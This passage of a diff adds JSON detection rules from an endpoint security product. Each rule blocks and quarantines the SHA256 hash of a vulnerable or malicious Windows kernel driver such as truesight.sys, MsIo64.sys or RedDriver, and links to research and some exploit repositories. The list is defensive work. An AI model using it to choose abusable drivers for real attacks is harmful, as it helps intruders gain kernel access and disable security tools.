+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484783Z",
+ "creation_date": "2026-03-23T11:45:31.484787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4eaed32c4a725c43c3f5b5666a3c5d24fc89b435cf3d2388fdd37e856902204b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79b8790b-36e6-5f62-b401-4604bc093ae2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621967Z",
+ "creation_date": "2026-03-23T11:45:29.621969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9512115b60e67fa268a7463119add2404150842bb3dffa41124b12dd9cb580a2",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79e848a9-6f06-5653-b5ee-49ee2ebc6b8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608544Z",
+ "creation_date": "2026-03-23T11:45:29.608546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfb7af8ac67a379e7869289aeee21837c448ea6f8ab6c93988e7aa423653bd40",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79fbe06e-e59b-566f-b9cc-b21f65750e9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830517Z",
+ "creation_date": "2026-03-23T11:45:31.830519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830524Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9165d4f3036919a96b86d24b64d75d692802c7513f2b3054b20be40c212240a5",
+ "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79fd5c59-21fa-5d10-aa23-d747f2cf98b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497781Z",
+ "creation_date": "2026-03-23T11:45:31.497784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "607eeb68431468850b48f805deedd5d28c9f46db4f830f7478f583ce00104c1d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79fd87d2-d887-522e-b7f5-ceb2188cbf48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160082Z",
+ "creation_date": "2026-03-23T11:45:31.160084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "622a4e536379a8ce8b2952d62e648ed38a5a4671073d135cfd845d1e6c2dbe32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a139dcf-c09d-5828-b8b7-1d635b6e9d6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811257Z",
+ "creation_date": "2026-03-23T11:45:31.811259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52f99c59a2b6435be245ef03c7df4567e414791f4eb85e42b89c9a884fba3a1f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a22d28d-ab8e-5f10-897d-d54e7f1eec70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831163Z",
+ "creation_date": "2026-03-23T11:45:30.831165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74676ad031b03d26fac1425c1328262abed379ded73983efccea71668058633c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a235aae-3d58-50ac-8237-cf29539344cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830411Z",
+ "creation_date": "2026-03-23T11:45:31.830413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c60f7f3d1a2ffb80baee5f29cc13b435162f15b21c5d643276f1a9d2dde83b03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a433bab-94d6-59e5-b664-cb5c67d248d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827293Z",
+ "creation_date": "2026-03-23T11:45:31.827295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6b7001bad1770540f04ccd63933e231d9f4739d61bf2cc2c6a5080f954f9296",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a46c618-76aa-59cf-9fe5-568e708df909",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820248Z",
+ "creation_date": "2026-03-23T11:45:30.820250Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cec5964d7e32c52439d5eb660fa97827b619a7da9f3264f0c9fa4b69e3cb7cc1",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a4a17d4-8003-5f15-b448-a344e42ba920",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614161Z",
+ "creation_date": "2026-03-23T11:45:29.614163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a7c4c2f-ae12-566a-95ae-7b4d8f316613",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815509Z",
+ "creation_date": "2026-03-23T11:45:31.815511Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f118bf09da64c4e9e5ed719cb23bde8f7b689c9ee32522f936c86f9d12ccdf64",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a87140d-b469-54cb-90cf-626ccdd71509",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622474Z",
+ "creation_date": "2026-03-23T11:45:29.622476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7dfc2eb033d2e090540860b8853036f40736d02bd22099ff6cf665a90be659cd",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7a9c31a7-a09c-5135-8aa1-1f2af39446e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458494Z",
+ "creation_date": "2026-03-23T11:45:30.458497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c21b7065cb961127ab9e2a0251ab8d50cfd65369a41e88e36bc2908af2b1d8d",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7aac41e8-e037-55f1-9603-a098eb1db07d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985915Z",
+ "creation_date": "2026-03-23T11:45:29.985918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82b0e1d7a27b67f0e6dc39dc41e880bdaef5d1f69fcec38e08da2ed78e805ef9",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ab3fe55-b159-54b1-b78b-d458de4410cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476532Z",
+ "creation_date": "2026-03-23T11:45:31.476536Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "580560d9a5e1122524037da3faaedc5590ee08ad64a0134dcf735cd1d4754c0d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ac080d9-e10f-5e4d-bba2-d81891018bf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976101Z",
+ "creation_date": "2026-03-23T11:45:29.976103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09934191a9af0ab2fb1dd47a1d0e0c7c3537b53286828ffaf361d0eeac045ccb",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ac9ceff-40fd-5cff-8673-32431232cc31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980900Z",
+ "creation_date": "2026-03-23T11:45:29.980902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8ff7c9f510f7a2ed88d9b336d8c9339698d5e1ee14bfb91aa89703ec06dce42",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ad00c41-a229-591d-8c96-181726e4d1cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984858Z",
+ "creation_date": "2026-03-23T11:45:29.984860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3",
+ "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ad1aac4-dfb5-5d05-a172-0ff4f1097783",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143576Z",
+ "creation_date": "2026-03-23T11:45:32.143578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8d45fa03f56e2ea14920b902856666b8d44f1f1b16644baf8c1ae9a61851fb6",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ad1d438-bddc-5c68-9a7b-aab0db6f0994",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146154Z",
+ "creation_date": "2026-03-23T11:45:32.146157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146162Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65205e494d01e07c27da9a623ee5edad33dbcedc755ef5155b19cb2e908cf185",
+ "comment": "Malicious Kernel Driver (aka driver_a6deeea6.sys) [https://www.loldrivers.io/drivers/f694c0e1-b75d-4c41-acbd-a87b72d8abe4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ad2d8b8-faf4-5dd8-816b-d36d4cf3c534",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485071Z",
+ "creation_date": "2026-03-23T11:45:31.485074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
